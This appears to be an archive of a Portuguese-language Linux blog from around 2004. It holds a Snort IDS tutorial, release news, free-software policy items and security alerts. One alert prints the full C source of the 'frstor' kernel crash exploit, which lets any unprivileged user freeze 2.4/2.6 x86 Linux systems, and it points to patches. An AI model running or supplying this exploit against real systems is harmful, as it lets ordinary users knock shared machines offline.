Configurando Snort

Neste artigo abaixo publicado no VivaOLinux.com.br voc? poder? conferir com subir um servidor IDS com o Snort.

Artigo recomendado.

Autor: Jefferson Estanislau da Silva
Data: 18/09/2003

Introdu??o

Quero come?ar dizendo que este artigo foi iniciado antes de saber da meteria da revista Hacker 11.

Esse meu artigo ? sobre IDS (Intrusion Detection System) ou Sistemas de Detec??o de Intrusos, inicialmente vou falar sobre o Snort, que ? considerado o melhor dentre os softwares livres utilizados para este servi?o.

O Snort ? uma das ferramentas mais utilizadas atualmente em servidores espalhados pela Internet, ele ? mantido por Brian Caswell e Marty Roesch e al?m de seu uso em Linux, est? dispon?vel tamb?m para Windows NT, podendo ser baixado em suas duas vers?es no site:
http://www.snort.org
O Snort possui tr?s modalidades principais, s?o elas:
Sniffer
Packet Logger
Network Intrusion Detection System.
O Sniffer ? o respons?vel por leitura de pacotes que trafegam pela rede. O Packet Logger registra os pacotes do disco e o Network Intrusion Detection System ? o que tem a configura??o mais complexa, permitindo que o Snort analise o tr?fego da rede e detecte tentativas de invas?o, por rules definidas pelo usu?rio.

? sobre est? ?ltima que eu irei falar.

Instala??o

O Snort vem com a maioria dos distros Linux no mercado, mas se voc? quiser, pode baixar a vers?o mais atual dele no site www.snort.org.

Presumindo que voc? fez o download para o diret?rio /usr/src, vamos descompact?-lo. Lembre-se que voc? deve estar como root.

# tar xvzf snort.x.x.tar.gz

Agora vamos configur?-lo.

# ./configure -prefix=/usr/local/snort
# make
# make install

Observe acima que ele foi instalado no diret?rio /usr/local/snort.

Agora, crie em /etc um diret?rio para o Snort:

# mkdir /etc/snort

Vamos mover o arquivo snort.conf de seu diret?rio atual para o que criamos:

# mv /usr/local/snort/snort.conf /etc/snort

Iremos alterar agora algumas linhas do arquivo snort.conf:

# mcedit /etc/snort/snort.conf

OBS: eu gosto de utilizar o mcedit, mas voc? poder? utilizar o de sua prefer?ncia.

Localize as seguintes linhas no final do arquivo:

# Path to your rules files (this can be a relative path)
var RULE_PATH ../rules

Edite-a desta forma:

# Path to your rules files (this can be a relative path)
#var RULE_PATH ../rules

A seguir, modifique as entradas de:

include $RULE_PATH/bad-traffic.rules

Para este formato:

include bad-traffic.rules

Salve o arquivo e feche o editor.

Agora devemos copiar as rules que est?o em seu diret?rio atual para o que criamos.

# cp /usr/local/snort/rules/*.* /etc/snort

Estas rules s?o as regras que o Snort utilize para identificar e interpretar os ataques realizados em sua m?quina pelos invasores.

Para finalizar, devemos agora criar um diret?rio para armazenar os logs dos ataques.

# mkdir /var/log/snort

Executando o Snort

J? estamos prontos para executar o Snort para ele come?ar a monitorar o sistema.

Primeiro entre no seguinte diret?rio:

# cd /usr/loca/snort/bin

Agora execute a linha de comando:

# ./snort -c /etc/snort/snort.conf -i eth0 &

Estamos startando o Snort para que ele leia o arquivo de configura??o que n?s editamos com a op??o -c e mandando ele ficar escutando as conex?es realizadas em eth0 com a op??o -i. O & ? para ele ser executado em background.

Por default ele armazena os logs dos ataques em /var/log/snort, n?o sendo necess?rio evidenci?-lo.

Agora basta fazer verifica??es na pasta de logs para ver se sua m?quina est? sendo atacada.

Para maiores informa??es sobre esta e as outras modalidades no Snort, consulte sua documenta??o em:
http://snort/docs/writing_rules/index.html

Conclus?o

N?o sou um perito em seguran?a, mas neste pouco tempo em que tenho utilizado o Snort, j? deu para perceber que ela, juntamente com o Honeypot, s?o realmente ?timas ferramentas para monitora??o e estudo de ataques.

Na parte 2 deste artigo, irei falar sobre o Honeypot para complementar o uso desta ferramenta.

Por: Jefferson Estanislau da Silva
Analista de Sistemas

——————————————————————————–

http://www.vivaolinux.com.br/artigos/verArtigo.php?codigo=383

Voltar para o site

Posted in Sem categoria

Saiu o Slackware 10.0

Foi lan?ada ontem a nova vers?o do Slackware, que vem com o kernel 2.4.26. Alguns dos recursos que vem com essa vers?o s?o: melhoramentos no sistema de impress?o, tendo uma nova vers?o do CUPS e do LPRng; suporte completo para conex?es com OpenSSL, OpenSSH, e GnuPG; novas ferramentas de desenvolvimento; uma vers?o pr?-compilada do kernel 2.6.7 para quem preferir. Para ver mais sobre as mudan?as nessa vers?o ? s? dar uma olhada no Change-log.

A distro pode ser adquirida atrav?s da loja do Slackware ou pode ser baixada via BitTorrent ou em um dos mirrors.

Para mais informa??es, veja o an?ncio oficial: http://www.slackware.com/announce/10.0.php

Posted in Sem categoria

Importando bases de dados .sql

Dica interessante para aqueles que n?o est?o particularizados com o MYSQL.

Para importar uma estrutura de dados no MySQL basta usar o comando:

mysql -psua-senha nome-da-base < estrutura.sqlUma outra maneira bem fácil de importar e sem erro é conectando com o comando mysql e depois fazendo um source na tabela:Ex:

mysql -u user -p ( tecle enter )
use sua-database;
source nome-do-arquivo.sql; ( enter )

Posted in Sem categoria

Patente de sistema de arquivos pode amea?ar o GNU/Linux

A comunidade do software livre est? de olho no Escrit?rio de Marcas e Patentes dos Estados Unidos, que na semana passada decidiu rever a patente da Microsoft sobre o sistema de arquivos FAT (File Allocation Table), formato usado pelo sistema operacional para organizar arquivos no disco r?gido, entre outras coisas.

Desenvolvido pela Microsoft em 1976, o sistema FAT ? praticamente onipresente em computadores dom?sticos com Windows. Mas ele tamb?m ? usado pelo software de c?digo-fonte aberto Samba, que permite aos sistemas operacionais GNU/Linux e Unix trocarem dados com computadores que usam Windows.

Alguns representantes da comunidade do software livre como Eben Moglen –que ? conselheiro da Free Software Foundation e membro da PubPat (Public Patent Foundation)– est?o preocupados com a quest?o, j? que a Microsoft poderia, no futuro, alegar que o GNU/Linux infringe essas patentes.

Isso amea?aria esse sistema operacional, que n?o mais poderia ser distribu?do caso contivesse tecnologia patenteada que exigisse pagamento de royalties. Ou ent?o, programadores de software livre teriam um pouco de trabalho para retirar do GNU/Linux o suporte ao sistema FAT.

A pr?pria PubPat, organiza??o sem fins lucrativos que descreve sua miss?o como “proteger o p?blico de preju?zos causados por patentes emitidas injustamente”, pediu que o Escrit?rio de Marcas e Patentes revisasse o caso.

No pedido, a organiza??o diz que “infelizmente, a Microsoft est? usando seu controle sobre o interc?mbio de dados como aliado em seus esfor?os para deterioras a competi??o do software gratuito e de c?digo aberto”.

Segundo Moglen, a PubPat pediu a revis?o para garantir que a Microsoft n?o use a patente para impedir que o GNU/Linux e outros programas de c?digo-fonte aberto compartilhem dados com sistemas FAT.

Fonte: Folha Online

Posted in Sem categoria

NOTA ? IMPRENSA – S?rgio Amadeu

Em aten??o ?s demandas da imprensa nacional e internacional, que se solidariza com o Governo Brasileiro nesse momento sem precedentes na hist?ria, em que o dirigente de uma importante institui??o p?blica deste Pa?s sofre pessoalmente a a??o daqueles interessados em manter um modelo hegem?nico, venho, ap?s ouvir meus advogados e procuradores federais, dizer que a provoca??o judicial movida contra minha pessoa ?, por si s?, t?o inusitada e descabida, que n?o merece resposta.

Por outro lado, gostaria de registrar que a contrata??o de software preservando os valores liberdade e abertura ?, para o Governo Brasileiro, uma quest?o ligada de forma indissol?vel ao princ?pio democr?tico. E porque se percorreu um longo e doloroso caminho para chegar ao est?gio atual de desenvolvimento da democracia neste Pa?s, n?o arrefeceremos em nossa luta.

Se democracia ? um valor repleto de ideologia, n?o ? jamais um valor insignificante. Se democracia ? um sonho, ? um sonho do qual este Pa?s jamais acordar? novamente.

O futuro ? livre.

SERGIO AMADEU DA SILVEIRA
Diretor-Presidente
Instituto Nacional de Tecnologia da Informa??o

Posted in Sem categoria

O Brasil tem Direito de Escolher: Richard Stallman se manifesta

O Presidente da Free Software Foundation e um dos criadores do movimento Software Livre, o hacker Richard Stallman, comenta as a??es de intimida??o da MS contra o governo brasileiro e as declara??es do funcion?rio da empresa de que as decis?es s?o “influenciadas pela ideologia”:
“A ?nica resposta poss?vel ?, claro que sim. Nosso governo tem uma ideologia de liberdade e de independ?ncia, e ? claro que isso se v? em nossas decis?es”.

“Microsoft Brasil, Emilio Umeoka, inicia una tentativa de intimidaci?n declarando que la decisi?n del gobierno brasile?o de apoyar el software libre en los computadores del sector p?blico est? siendo “influenciada por la ideolog?a”.
– La ?nica respuesta posible es, “Seguro que s?. Nuestro gobierno tiene una ideolog?a de libertad y de independencia, y seguro que se ve en nuestras decisiones.”

“La autoridad brasile?a recibi? una notificaci?n judicial de una causa criminal abierta por la empresa contra supuestas declaraciones de ?ste a la revista semanal “Carta Capital” en la que dice que la donaci?n de software para gobiernos es una pr?ctica como la de los traficantes.”

– No conozco las layes brasile?os. ?Es de verdad ilegal decir tales cosas en Brasil? En los EEUU, no ser?a ilegal. Si es claro que Microsoft no puede ganar, lo necesario es que Lula muestre su apoyo continuo para Sergio, comitiendo los recursos del gobierno a su defensa.

La respuesta a la intimidaci?n es mostrarse no intimidado. Pienso que Sergio debe continuar diciendo la misma cosa, para mostrar que la intimidaci?n no funciona. Ser?a bueno que Lula y Sarney tambi?n las digan, como manera de mostrar a Microsoft que este no pasa.

Quiz?s ?til para la defensa:

“Although about three million computers get sold every year in China, people don’t pay for the software. Someday they will, though. And as long as they’re going to steal it, we want them to steal ours. They’ll get sort of addicted, and then we’ll somehow figure out how to collect sometime in the next decade.”

Bill Gates, Address to UW Quoted on July 20, 1998 in Fortune Magazine

Fonte: PSL Brasil

Posted in Sem categoria

Microsoft esclarece pedido de explica??o a diretor do ITI

A Microsoft emitiu hoje uma nota onde esclarece o epis?dio do pedido de explica??o que a empresa fez a S?rgio Amadeu da Silveira, presidente do Instituto Nacional de Tecnologia da Informa??o (ITI).

Nota de esclarecimento
N?o estamos processando ningu?m, e o pedido de explica??es n?o est? relacionado a uma quest?o pessoal.

A Microsoft continua comprometida com um di?logo respeitoso e aberto com o governo, clientes e a ind?stria para endere?ar as necessidades da economia e da comunidade brasileiras.

A Microsoft est? presente no pa?s h? mais de 14 anos. Nosso compromisso com o pa?s ? de longo prazo. Por meio de nossos 10.000 parceiros, 45.000 empregos s?o gerados no Brasil e mais de R$ 1 bilh?o ? recolhido em impostos anualmente.

Rinaldo Zangirolami
Diretor Geral de Assuntos Jur?dicos e Corporativos
Microsoft Brasil

Fonte :Terra

Posted in Sem categoria

Processos Jailed possibilita manipular tabelas de rotas de hosts no FreeBSD

Artigo disponibilizado no sistema de avisos de seguran?a do projeto FreeBSD.

Abaixo segue o aviso seguran?a:

FreeBSD-SA-04:12.jailroute Security
Advisory
The FreeBSD
Project

Topic: Jailed processes can manipulate host routing tables

Category: core
Module: kernel
Announced: 2004-06-07
Credits: Pawel Malachowski
Affects: All FreeBSD 4.x releases prior to 4.10-RELEASE
Corrected: 2004-04-06 20:11:53 UTC (RELENG_4)
2004-06-07 17:44:44 UTC (RELENG_4_9, 4.9-RELEASE-p10)
2004-06-07 17:42:42 UTC (RELENG_4_8, 4.8-RELEASE-p23)
CVE Name: CAN-2004-0125
FreeBSD only: YES

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit
.

I. Background

The jail(2) system call allows a system administrator to lock up a
process and all its descendants inside a closed environment with very
limited ability to affect the system outside that environment, even
for processes with superuser privileges. It is an extension of, but
far more stringent than, the traditional Unix chroot(2) system call.

The FreeBSD kernel maintains internal routing tables for the purpose
of determining which interface should be used to transmit packets.
These routing tables can be manipulated by user processes running
with superuser privileges by sending messages over a routing socket.

II. Problem Description

A programming error resulting in a failure to verify that an attempt
to manipulate routing tables originated from a non-jailed process.

III. Impact

Jailed processes running with superuser privileges could modify host
routing tables. This could result in a variety of consequences
including
packets being sent via an incorrect network interface and packets being
discarded entirely.

IV. Workaround

No workaround is available.

V. Solution

Do one of the following:

1) Upgrade your vulnerable system to 4.10-RELEASE, or to the RELENG_4_8
or RELENG_4_9 security branch dated after the correction date.

OR

2) Patch your present system:

The following patch has been verified to apply to the FreeBSD 4.8 and
4.9 systems.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-04:12/jailroute.patch
# fetch
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-04:12/jailroute.patch.asc

b) Apply the patch.

# cd /usr/src
# patch < /path/to/patchc) Recompile your kernel as described in
and reboot the
system.

VI. Correction details

The following list contains the revision numbers of each file that was
corrected in FreeBSD.

Branch
Revision
Path

————————————————————————-
RELENG_4
src/sys/net/rtsock.c
1.44.2.13
RELENG_4_9
src/UPDATING
1.73.2.89.2.11
src/sys/conf/newvers.sh
1.44.2.32.2.11
src/sys/net/rtsock.c
1.44.2.11.4.1
RELENG_4_8
src/UPDATING
1.73.2.80.2.26
src/sys/conf/newvers.sh
1.44.2.29.2.24
src/sys/net/rtsock.c
1.44.2.11.2.1

Posted in Sem categoria

Falha cr?tica no Kernel do Gnu/Linux.

Segundo a fonte do alerta, o problema se manifesta quando o codigo em
questao e’ compilado com o GCC versoes 3.0, 3.1, 3.2, 3.3 ou 3.3.2, e
e’
executado em sistemas rodando o kernel do Linux nas versoes 2.4.2x ou
2.6.x em arquitetura x86. Sistemas utilizando os processadores AMD64
tambem podem ser afetadas.

O problema se torna mais serio devido ao fato do usuario que compila e
executa o programa nao necessitar ter acesso privilegiado ao sistema.
Assim, qualquer usuario que tenha acesso a um shell no sistema podera
causar o travamento da maquina.

Sistemas afetados:

Sistemas utilizando os seguintes kernels foram testados e sao
comprovadamente vulneraveis:

. Kernel Linux 2.6.x
. 2.6.7-rc2
. 2.6.6 (vanilla)
. 2.6.6-rc1 SMP
. 2.6.6 SMP
. 2.6.5-gentoo
. 2.6.5-mm6
. 2.6.5 (fedora core 2 vanilla)
. Kernel Linux 2.4.2x
. 2.4.26 vanilla
. 2.4.26, grsecurity 2.0 config
. 2.4.26-rc1 vanilla
. 2.4.26-gentoo-r1
. 2.4.22
. 2.4.22-1.2188 Fedora FC1 Kernel
. 2.4.18-bf2.4 (debian woody vanilla)
. Kernel com patches grsecurity
. Kernel 2.5.6 SMP
. Kernel 2.6.6 SMP do Linux.

Alem disso, outras versoes de kernel da serie 2.4 e 2.6 podem ser
afetadas
por esta vulnerabilidade.

Sistemas *nao* afetados:

O codigo malicioso nao causa qualquer estrago e termina exibindo a
mensagem de erro “Floating point exception” nos sistemas rodando as
seguintes versoes de kernel:

. Linux nudge 2.6.5-1um i686 (o kernel do User Mode Linux) Dylan
Smith
. Linux Kernel 2.6.4 SMP com o patch staircase scheduler Guille
aplicado
. Linux kernel 2.4.26-rc3-gentoo (gcc 3.3.3)
. Linux kernel 2.4.26_pre6-gentoo (gcc 3.3.2)
. Linux Kernel 2.4.25-gentoo-r1 Charles A. Haines (3G Publishing)
. 2.2.19-kernel
. kernel 2.6.5-1um do User Mode Linux. E’ possivel que outras
versoes de kernel do User Mode Linux tambem o sejam.

Correcoes disponiveis:

Para corrigir o problema recomenda-se a atualizacao do kernel e
aplicacao
de um patch para o kernel utilizado, de acordo com o que esta descrito
em:

http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html

Mais informacoes:

.. New Kernel Crash-Exploit discovered
http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html

Abaixo segue o c?digo fonte do progrma escrito em C:

/* ——————–
* frstor Local Kernel exploit
* Crashes any kernel from 2.4.18
* to 2.6.7 because frstor in assembler inline offsets in memory by 4.
* Original proof of concept code
* by stian_@_nixia.no.
* Added some stuff by lorenzo_@_gnu.org
* and fixed the fsave line with (*fpubuf).
* ——————–
*/

/*
———
Some debugging information made
available by stian_@_nixia.no
———
TakeDown:
pushl %ebp
movl %esp, %ebp
subl $136, %esp
leal -120(%ebp), %eax
movl %eax, -124(%ebp)
#APP
fsave -124(%ebp)

#NO_APP
subl $4, %esp
pushl $1
pushl $.LC0
pushl $2
call write
addl $16, %esp
leal -120(%ebp), %eax
movl %eax, -128(%ebp)
#APP
frstor -128(%ebp)

#NO_APP
leave
ret
*/

#include
#include
#include

static void TakeDown(int ignore)
{
char fpubuf[108];
// __asm__ __volatile__ (“fsave %0\n” : : “m”(fpubuf));
__asm__ __volatile__ (“fsave %0\n” : : “m”(*fpubuf));
write(2, “*”, 1);
__asm__ __volatile__ (“frstor %0\n” : : “m”(fpubuf));
}

int main(int argc, char *argv[])
{
struct itimerval spec;
signal(SIGALRM, TakeDown);
spec.it_interval.tv_sec=0;
spec.it_interval.tv_usec=100;
spec.it_value.tv_sec=0;
spec.it_value.tv_usec=100;
setitimer(ITIMER_REAL, &spec, NULL);
while(1)
write(1, “.”, 1);

return 0;
}
// < As administradores de rede um alerta.

Posted in Sem categoria

Aparece o primeiro v?rus para celular

Demorou mas apareceu: o primeiro v?rus para celular se chama Cabir e atinge os celulares da s?rie 60 da Nokia. Os ?nicos danos causados por ele s?o consumir excessivamente a bateria e se transferir para outros aparelhos, atrav?s da tecnologia Bluetooth.

De acordo com essa reportagem: Ao ser enviado para um aparelho celular semelhante e com Bluetooth ativado, o Cabir envia um arquivo de instala??o (.sis) do Symbian. O usu?rio precisa aceitar o recebimento e acionar a instala??o do arquivo para ter seu telefone infectado. Para convencer a v?tima, o worm finge ser um arquivo do sistema de seguran?a do celular, chamado Caribe. Apesar de n?o ter sido identificado em outros sistemas, as fornecedoras de antiv?rus afirmam que o Cabir poderia infectar telefones de outros fabricantes e sistemas operacionais. De qualquer forma, o uso da tecnologia Bluetooth oferece, por si s?, algumas limita??es ? dissemina??o deste tipo de v?rus, incluindo o fato de que o alcance m?dio atual de aparelhos com Bluetooth ? de cerca de 10 metros.

http://informatica.terra.com.br/interna/0,,OI326189-EI559,00.html

Posted in Sem categoria

Saiu o Mozilla Firefox 0.9

Ontem o Mozilla Firefox 0.9 foi oficialmente lan?ado. Entre as inova??es existentes da vers?o 0.8 para essa, est?o: F?cil migra??o, j? que a nova vers?o importa favoritos, hist?ricos, cookies e etc do Internet Explorer, Mozilla, Netscape ou Opera; o SmartUpdate, que avisa de novas vers?es do navegador; e um gerenciador de temas.

O download pode ser feito aqui.aqui

http://slashdot.org/articles/04/06/16/0023225.shtml?tid=126&tid=154&tid=95

Posted in Sem categoria

Mais ?rg?os p?blicos dos EUA adotam Linux

De acordo com essa reportagem da Info, o AOUSC (Administrative Office of the US Courts – Escrit?rio Administrativo das Cortes dos Estados Unidos) est? migrando de seus sistemas Solaris para Linux. Para garantir o suporte, foi feito um contrato com a empresa BakBone Software, especializada em suporte a Linux. Al?m da AOUSC, outros ?rg?os p?blicos dos Estados Unidos j? adotaram o Linux. Entre eles: o Departamento de Agricultura, o Instituto Nacional de Sa?de, a Divis?o de Servi?os Comunit?rios da Marinha e o Comando de Sistemas Eletr?nicos das For?as A?reas.

Leia mais em:

http://info.abril.com.br/aberto/infonews/062004/14062004-4.shl

Posted in Sem categoria

Falha grave no Kernel do Linux

Foi divulgada a descoberta de uma falha no Kernel do Linux. Esta falha faz com que um c?digo malicioso provoque um crash, travando todo o sistema. A falha atinge as vers?es 2.4.2x e 2.6.x nas arquiteturas x86 e x86_86.

O problema ocorre quando o c?digo malicioso – que pode ser visto aqui – ? compilado. O que torna o problema mais grave ? que para compilar o c?digo, o usu?rio n?o precisa ser root: qualquer user com acesso a shell pode faz?-lo.

Os patches para corre??o do problema j? est?o dispon?veis e podem ser baixados aqui:

http://www.linuxreviews.org/news/2004-06-11_kernel_crash/index.html#toc6 http://www.golivre.org/modules.php?name=News&file=article&sid=359 http://www.linuxreviews.org/news/2004-06-11_kernel_crash/index.html

Posted in Sem categoria